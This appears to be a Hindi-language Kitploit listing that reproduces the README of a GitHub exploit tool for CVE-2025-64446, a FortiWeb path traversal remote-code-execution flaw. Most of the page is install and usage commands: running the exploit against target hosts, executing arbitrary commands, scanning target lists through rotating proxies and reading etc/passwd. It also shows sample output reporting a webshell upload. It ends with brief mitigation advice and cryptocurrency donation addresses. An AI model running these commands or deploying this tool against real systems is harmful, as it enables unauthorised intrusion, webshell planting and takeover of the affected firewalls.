Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
cve-2025-64446-fortiweb-exploit — Security research tool for detecting and testing CVE-2025-64446 (FortiWeb Path Traversal RCE vulnerability) | Kitploit
उपकरण/GitHubGitHub/an5i/cve-2025-64446-fortiweb-exploit
टोहीभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणवेब सुरक्षापेनिट्रेशन टेस्टिंगलर्निंग और शिक्षापेलोड डेवलपमेंट

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
GitHub
an5i/cve-2025-64446-fortiweb-exploit

cve-2025-64446-fortiweb-exploit

Security research tool for detecting and testing CVE-2025-64446 (FortiWeb Path Traversal RCE vulnerability)

रिपॉजिटरी देखें
1119 महीने पहलेअभी तक समीक्षित नहीं

CVE-2025-64446 Fortinet FortiWeb पथ ट्रैवर्सल RCE एक्सप्लॉइट

Fortinet FortiWeb वेब एप्लीकेशन फ़ायरवॉल (WAF) में CVE-2025-64446 भेद्यता का पता लगाने और परीक्षण करने के लिए एक सुरक्षा अनुसंधान उपकरण। यह महत्वपूर्ण ज़ीरो-डे पथ ट्रैवर्सल भेद्यता सक्रिय रूप से वास्तविक दुनिया में शोषित की जा रही है और अनधिकृत हमलावरों को सुरक्षा नियंत्रणों को बायपास करने और मनमाना कोड निष्पादित करने की अनुमति देती है।

⚠️ अस्वीकरण

यह उपकरण केवल अधिकृत सुरक्षा परीक्षण और शैक्षिक उद्देश्यों के लिए है। कंप्यूटर सिस्टम तक अनधिकृत पहुंच अवैध है। इस उपकरण का उपयोग केवल उन सिस्टम पर करें जिनके आप मालिक हैं या जिनके परीक्षण के लिए आपके पास स्पष्ट लिखित अनुमति है।

📋 अवलोकन

CVE-2025-64446 Fortinet FortiWeb WAF में एक महत्वपूर्ण ज़ीरो-डे पथ ट्रैवर्सल भेद्यता है जो सक्रिय रूप से वास्तविक दुनिया में शोषित की जा रही है। यह भेद्यता अनधिकृत हमलावरों को पथ ट्रैवर्सल हमलों के माध्यम से सुरक्षा नियंत्रणों को बायपास करने की अनुमति देती है, जिससे संभावित रूप से रिमोट कोड निष्पादन, कॉन्फ़िगरेशन फ़ाइल एक्सेस और पूर्ण सिस्टम से समझौता हो सकता है।

CVSS स्कोर: 9.8 (गंभीर)
स्थिति: वास्तविक दुनिया में सक्रिय रूप से शोषित
CISA KEV: ज्ञात शोषित भेद्यताओं की सूची में जोड़ा गया
पैच: FG-IR-25-910
प्रभावित उत्पाद: Fortinet FortiWeb WAF

🔍 विशेषताएँ

  • स्वचालित FortiWeb पहचान: FortiWeb WAF तैनाती की पहचान करता है
  • पथ ट्रैवर्सल परीक्षण: कई पथ ट्रैवर्सल पेलोड वेरिएशन का परीक्षण करता है
  • भेद्यता पुष्टि: CVE-2025-64446 भेद्यता की पुष्टि करता है
  • कॉन्फ़िगरेशन फ़ाइल एक्सेस: FortiWeb कॉन्फ़िगरेशन फ़ाइलों को पढ़ने का प्रयास करता है
  • वेबशेल तैनाती: वेबशेल अपलोड क्षमता प्रदर्शित करता है
  • कमांड निष्पादन: मनमाना कमांड निष्पादित करता है (अधिकृत परीक्षण के लिए)
  • मल्टी-थ्रेडिंग समर्थन: एक साथ कई लक्ष्यों को स्कैन करें
  • प्रॉक्सी समर्थन: अतिरिक्त सुरक्षा प्रतिबंधों को बायपास करें
  • JSON निर्यात: JSON प्रारूप में विस्तृत परिणाम
  • POC स्क्रिप्ट शामिल: सरल प्रूफ-ऑफ-कॉन्सेप्ट प्रदर्शन

📦 स्थापना

पूर्वापेक्षाएँ

  • Python 3.6 या उच्चतर
  • pip (Python पैकेज प्रबंधक)

त्वरित स्थापना

root@kitploit:~
# Clone the repository
git clone https://github.com/AN5I/cve-2025-64446-fortiweb-exploit.git
cd cve-2025-64446-fortiweb-exploit

# Install dependencies
pip install -r requirements.txt

# Make scripts executable (optional)
chmod +x cve_2025_64446_fortiweb_exploit.py
chmod +x cve_2025_64446_poc.py

वैकल्पिक: सीधा डाउनलोड

root@kitploit:~
# Download the scripts
wget https://raw.githubusercontent.com/AN5I/cve-2025-64446-fortiweb-exploit/main/cve_2025_64446_fortiweb_exploit.py
wget https://raw.githubusercontent.com/AN5I/cve-2025-64446-fortiweb-exploit/main/cve_2025_64446_poc.py

# Install dependencies
pip install requests

🚀 उपयोग

बुनियादी उपयोग

root@kitploit:~
# Single target
python3 cve_2025_64446_fortiweb_exploit.py -u http://target.com

# Execute custom command
python3 cve_2025_64446_fortiweb_exploit.py -u http://target.com -c "whoami"

# Multiple targets from file
python3 cve_2025_64446_fortiweb_exploit.py -f targets.txt -o results.json

# With threading for faster scanning
python3 cve_2025_64446_fortiweb_exploit.py -u http://target.com -t 5

# Verbose output for debugging
python3 cve_2025_64446_fortiweb_exploit.py -u http://target.com -v

प्रॉक्सी का उपयोग

root@kitploit:~
# Single proxy
python3 cve_2025_64446_fortiweb_exploit.py -u http://target.com --proxy http://proxy:port

# Multiple proxies from file
python3 cve_2025_64446_fortiweb_exploit.py -f targets.txt --proxy-list proxies.txt

POC स्क्रिप्ट

root@kitploit:~
# Basic POC test
python3 cve_2025_64446_poc.py -u http://target.com

# Test specific file
python3 cve_2025_64446_poc.py -u http://target.com -f etc/passwd

# Verbose output
python3 cve_2025_64446_poc.py -u http://target.com -v

कमांड लाइन विकल्प

root@kitploit:~
-u, --url          Target URL
-f, --file         File containing target URLs (one per line)
-c, --command      Command to execute (default: id)
-t, --threads      Number of threads (default: 1)
-o, --output       Output file (default: uknf_fortiweb_results.json)
-v, --verbose      Enable verbose logging
--proxy            Proxy URL (e.g., http://127.0.0.1:8080)
--proxy-list       File containing proxy URLs (one per line)

📊 आउटपुट

स्क्रिप्ट विस्तृत परिणामों के साथ एक JSON फ़ाइल उत्पन्न करती है:

root@kitploit:~
{
  "target": "http://target.com",
  "timestamp": "2025-11-21T00:25:40.123456",
  "fortiweb_detected": true,
  "vulnerable": true,
  "path_traversal_successful": true,
  "config_file_read": true,
  "webshell_uploaded": true,
  "command_executed": "id",
  "output": "uid=1000(user) gid=1000(user)...",
  "vulnerable_payload": "../../../../etc/passwd"
}

🔬 यह कैसे काम करता है

  1. पहचान चरण: FortiWeb WAF संकेतक (हेडर, सामग्री, त्रुटि पृष्ठ) के लिए स्कैन करता है
  2. भेद्यता परीक्षण: कई पथ ट्रैवर्सल पेलोड वेरिएशन का परीक्षण करता है
  3. पथ ट्रैवर्सल पुष्टि: सफल फ़ाइल एक्सेस की पुष्टि करता है
  4. कॉन्फ़िगरेशन एक्सेस: FortiWeb कॉन्फ़िगरेशन फ़ाइलों को पढ़ने का प्रयास करता है
  5. शोषण: यदि भेद्यता मौजूद है, तो वेबशेल तैनाती के माध्यम से RCE क्षमता प्रदर्शित करता है

🛡️ शमन

यदि आप FortiWeb WAF का उपयोग कर रहे हैं:

  1. तुरंत सुरक्षा अपडेट लागू करें:

    root@kitploit:~
    # Check current version
    show system status
    
    # Update to latest version
    execute upgrade <firmware-file>
    
    • संदर्भ: FG-IR-25-910
  2. नेटवर्क विभाजन:

    • FortiWeb प्रबंधन इंटरफ़ेस तक पहुंच प्रतिबंधित करें
    • नेटवर्क ACL लागू करें
    • प्रशासनिक पहुंच के लिए VPN का उपयोग करें
  3. कॉन्फ़िगरेशन सख्तीकरण:

    • अनावश्यक सुविधाओं को अक्षम करें
    • सख्त पहुंच नियंत्रण लागू करें
    • व्यापक लॉगिंग और निगरानी सक्षम करें
  4. CISA आवश्यकताएँ:

    • संघीय एजेंसियों को 7 दिनों के भीतर पैच लागू करना होगा
    • अपडेट के लिए CISA KEV कैटलॉग की निगरानी करें

📚 संदर्भ

  • CVE: CVE-2025-64446
  • Fortinet PSIRT: FG-IR-25-910
  • CISA KEV कैटलॉग: CVE-2025-64446
  • Tenable ब्लॉग: CVE-2025-64446 विश्लेषण

📖 उदाहरण

उदाहरण 1: एकल लक्ष्य स्कैन

root@kitploit:~
python3 cve_2025_64446_fortiweb_exploit.py -u https://example.com

उदाहरण 2: आउटपुट के साथ एकाधिक लक्ष्य

root@kitploit:~
# Create targets file
echo "https://target1.com" > targets.txt
echo "https://target2.com" >> targets.txt

# Run scan
python3 cve_2025_64446_fortiweb_exploit.py -f targets.txt -o results.json

उदाहरण 3: कस्टम कमांड निष्पादन

root@kitploit:~
python3 cve_2025_64446_fortiweb_exploit.py -u https://example.com -c "uname -a"

उदाहरण 4: प्रॉक्सी का उपयोग

root@kitploit:~
# Single proxy
python3 cve_2025_64446_fortiweb_exploit.py -u https://example.com --proxy http://127.0.0.1:8080

# Multiple proxies from file
echo "http://proxy1:8080" > proxies.txt
echo "http://proxy2:8080" >> proxies.txt
python3 cve_2025_64446_fortiweb_exploit.py -f targets.txt --proxy-list proxies.txt

उदाहरण 5: POC परीक्षण

root@kitploit:~
# Basic POC
python3 cve_2025_64446_poc.py -u https://example.com

# Test specific file
python3 cve_2025_64446_poc.py -u https://example.com -f etc/passwd

🤝 योगदान

योगदान का स्वागत है! कृपया बेझिझक एक पुल रिक्वेस्ट सबमिट करें।

  1. रिपॉजिटरी को फोर्क करें
  2. अपनी फीचर ब्रांच बनाएं (git checkout -b feature/AmazingFeature)
  3. अपने परिवर्तनों को कमिट करें (git commit -m 'Add some AmazingFeature')
  4. ब्रांच पर पुश करें (git push origin feature/AmazingFeature)
  5. एक पुल रिक्वेस्ट खोलें

🐛 मुद्दे

यदि आपको कोई समस्या आती है या सुझाव हैं, तो कृपया GitHub पर एक issue खोलें।

📝 लाइसेंस

यह प्रोजेक्ट MIT लाइसेंस के तहत लाइसेंस प्राप्त है - विवरण के लिए LICENSE फ़ाइल देखें।

⭐ स्टार हिस्ट्री

यदि आपको यह उपकरण उपयोगी लगता है, तो कृपया इसे GitHub पर एक स्टार देने पर विचार करें!

⚖️ कानूनी

यह उपकरण केवल शैक्षिक और अधिकृत सुरक्षा परीक्षण उद्देश्यों के लिए प्रदान किया गया है। लेखक इस प्रोग्राम के किसी भी दुरुपयोग या क्षति के लिए जिम्मेदार नहीं हैं। उपयोगकर्ता किसी भी सिस्टम का परीक्षण करने से पहले उचित प्राधिकरण सुनिश्चित करने के लिए जिम्मेदार हैं।

🙏 आभार

  • मूल भेद्यता रिपोर्टर और सुरक्षा शोधकर्ता
  • भेद्यता प्रकटीकरण के लिए Fortinet PSIRT
  • KEV कैटलॉग बनाए रखने के लिए CISA
  • चल रहे शोध के लिए सुरक्षा समुदाय

💰 दान

यदि आपको यह उपकरण उपयोगी लगता है और आप परियोजना का समर्थन करना चाहते हैं:

Bitcoin (BTC):

root@kitploit:~
bc1qj95y35w8r2mw0u28zrm3dmxtzjkq258xdv8tzv

Ethereum (ETH):

root@kitploit:~
0x3DC302a3f35F6cD1A03FF4982EcE0dE8fE1cEba7

आपके समर्थन के लिए धन्यवाद! 🙏

टूल डाउनलोड करें